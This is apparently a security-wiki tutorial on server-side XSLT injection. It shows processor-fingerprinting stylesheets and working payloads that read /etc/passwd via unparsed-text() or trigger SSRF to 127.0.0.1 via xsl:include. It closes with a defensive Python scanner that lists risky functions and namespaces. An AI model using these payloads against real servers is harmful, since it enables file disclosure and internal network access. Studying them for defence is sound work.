XSLT
Extensible Stylesheet Language Transformations
Extensible Stylesheet Language Transformations (XSLT) is an XML-based language used to transform XML documents into HTML, other XML, or (through XSL-FO) PDF. Server-side XSLT injection becomes possible when an application lets a user supply or upload an arbitrary XSLT stylesheet, or when it assembles the stylesheet dynamically from unvalidated user input. There are three XSLT versions (1.0, 2.0 and 3.0). Version 1.0 exposes the least built-in functionality and is therefore the least dangerous, but even 1.0 has document() for loading external resources, and most processors add vendor extension functions on top of the standard, so the processor in use matters as much as the version number.
Example
Saxon-B (XSLT 2.0) on Debian/Ubuntu; the libsaxonb-java package provides the saxonb-xslt command used below
sudo apt install default-jdk libsaxon-java libsaxonb-java
Files: catalogue.xml (the XML input document) and transformation.xsl (the stylesheet applied to it)
To see the result, run the transformation with the command-line processor:
saxonb-xslt -xsl:transformation.xsl catalogue.xml
Find the Underlying Processor
The stylesheets below are run against the catalogue.xml from the example above. The XSLT system-property() function reports the processor's vendor and supported XSLT version; those values tell you which functions and extensions the later payloads can rely on.
detection.xsl
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/">
<h2>XSLT identification</h2>
<b>Version:</b> <xsl:value-of select="system-property('xsl:version')"/><br/>
<b>Vendor:</b> <xsl:value-of select="system-property('xsl:vendor')" /><br/>
<b>Vendor URL:</b><xsl:value-of select="system-property('xsl:vendor-url')" /><br/>
</xsl:template>
</xsl:stylesheet>
saxonb-xslt -xsl:detection.xsl catalogue.xml
fingerprinting.xsl
<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
<!-- The properties below exist from XSLT 2.0 onward; the xsl:if guards keep a 1.0 processor from printing empty lines -->
<xsl:if test="system-property('xsl:product-name')">
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br /></xsl:if>
<xsl:if test="system-property('xsl:product-version')">
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br /></xsl:if>
<xsl:if test="system-property('xsl:is-schema-aware')">
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br /></xsl:if>
<xsl:if test="system-property('xsl:supports-serialization')">
Supports Serialization: <xsl:value-of select="system-property('xsl:supports-serialization')" /><br /></xsl:if>
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supports-backwards-compatibility')" /><br /></xsl:if>
</xsl:template>
</xsl:stylesheet>
saxonb-xslt -xsl:fingerprinting.xsl catalogue.xml
Attacks
Once the processor and XSLT version are known, consult the documentation for that processor to identify the functions of interest, for example:
unparsed-text
XSLT 2.0 function that reads a file or URL as plain text; pointed at a local path it reads local files.
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<!-- unparsed-text() is XSLT 2.0; the file content is emitted directly into the transformation output -->
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
saxonb-xslt -xsl:readfile.xsl catalogue.xml
xsl:include
Loads another stylesheet from the given href. Pointing it at an internal URL makes the server issue the request (SSRF); the transformation then fails because the response is not a valid stylesheet, but the request has already been sent. On processors limited to XSLT 1.0, document() reaches out in the same way.
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<!-- the processor fetches this URL while compiling the stylesheet, before any template runs -->
<xsl:include href="http://127.0.0.1:5000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
saxonb-xslt -xsl:ssrf.xsl catalogue.xml
Wordlist for brute-forcing the functions and extensions a processor exposes.
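The injection point described in the introduction is an application that accepts or assembles a stylesheet from user input. Where a stylesheet must be accepted from outside, the following Python script (an added example, not code from the original page; the EXTENSION_NAMESPACES list is an assumed, illustrative set) flags the constructs discussed above before the processor sees them: unparsed-text(), xsl:include/xsl:import, their relatives document()/doc()/collection(), and namespace declarations that bind processor extension functions such as the http://php.net/xsl prefix carried by the payloads above. The three stylesheets from this page are embedded as constructed samples.

```python
import io
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Standard functions that read local files or URLs. unparsed-text() is XSLT 2.0;
# document() exists in XSLT 1.0 as well, so it matters for every processor.
DANGEROUS_FUNCTIONS = (
    "unparsed-text-available", "unparsed-text-lines", "unparsed-text",
    "document", "doc-available", "doc", "collection",
)
# Namespace URIs (or URI prefixes) that bind processor extension functions.
# Assumed, illustrative list: extend it for the processor you fingerprinted.
EXTENSION_NAMESPACES = (
    "http://php.net/xsl", "http://saxon.sf.net/", "http://xml.apache.org/xalan",
    "http://exslt.org/", "xalan://", "java:",
)

# Matches e.g. unparsed-text(  or  abc:document(  but not  my-document(
FUNC_CALL_RE = re.compile(
    r"(?<![\w.-])(" + "|".join(re.escape(f) for f in DANGEROUS_FUNCTIONS) + r")\s*\("
)


def _split_tag(tag):
    """Return (namespace, local-name) for an ElementTree Clark-notation tag."""
    if tag.startswith("{"):
        ns, _, local = tag[1:].partition("}")
        return ns, local
    return "", tag


def scan_stylesheet(xslt_text):
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    findings = []
    data = xslt_text.encode("utf-8")

    # 1. Namespace declarations. ElementTree strips xmlns attributes from
    #    .attrib, so collect them from the parser's start-ns events instead.
    for _event, (prefix, uri) in ET.iterparse(io.BytesIO(data), events=("start-ns",)):
        if uri != XSL_NS and any(uri.startswith(p) for p in EXTENSION_NAMESPACES):
            findings.append(f"extension namespace {uri!r} bound to prefix {prefix!r}")

    # 2. Elements and their attributes.
    root = ET.fromstring(data)
    for elem in root.iter():
        ns, local = _split_tag(elem.tag)
        if ns == XSL_NS and local in ("include", "import"):
            findings.append(f"xsl:{local} loads external stylesheet {elem.get('href')!r}")
        # XPath lives in select/test/match attributes and in attribute value
        # templates, so every attribute value is scanned for calls.
        for attr, value in elem.attrib.items():
            for match in FUNC_CALL_RE.finditer(value):
                findings.append(f"{match.group(1)}() called in <{local}> @{attr}")
    return findings


# Constructed samples: the stylesheets shown on this page, embedded inline.
READFILE_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>"""

SSRF_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:5000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>"""

DETECTION_XSL = """<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/">
<b>Vendor:</b> <xsl:value-of select="system-property('xsl:vendor')"/><br/>
</xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, text in (("readfile.xsl", READFILE_XSL), ("ssrf.xsl", SSRF_XSL), ("detection.xsl", DETECTION_XSL)):
        print(name, "->", scan_stylesheet(text) or "clean")
```

Run it directly to see readfile.xsl and ssrf.xsl flagged while detection.xsl passes. Note that this is a deny-list: it catches the standard file and network functions, but a processor's own extensions (Saxon's Java bindings, PHP's registered functions) are only covered as far as the namespace list is extended, so the stronger control remains not accepting user-supplied stylesheets at all and running the processor with its secure-processing settings.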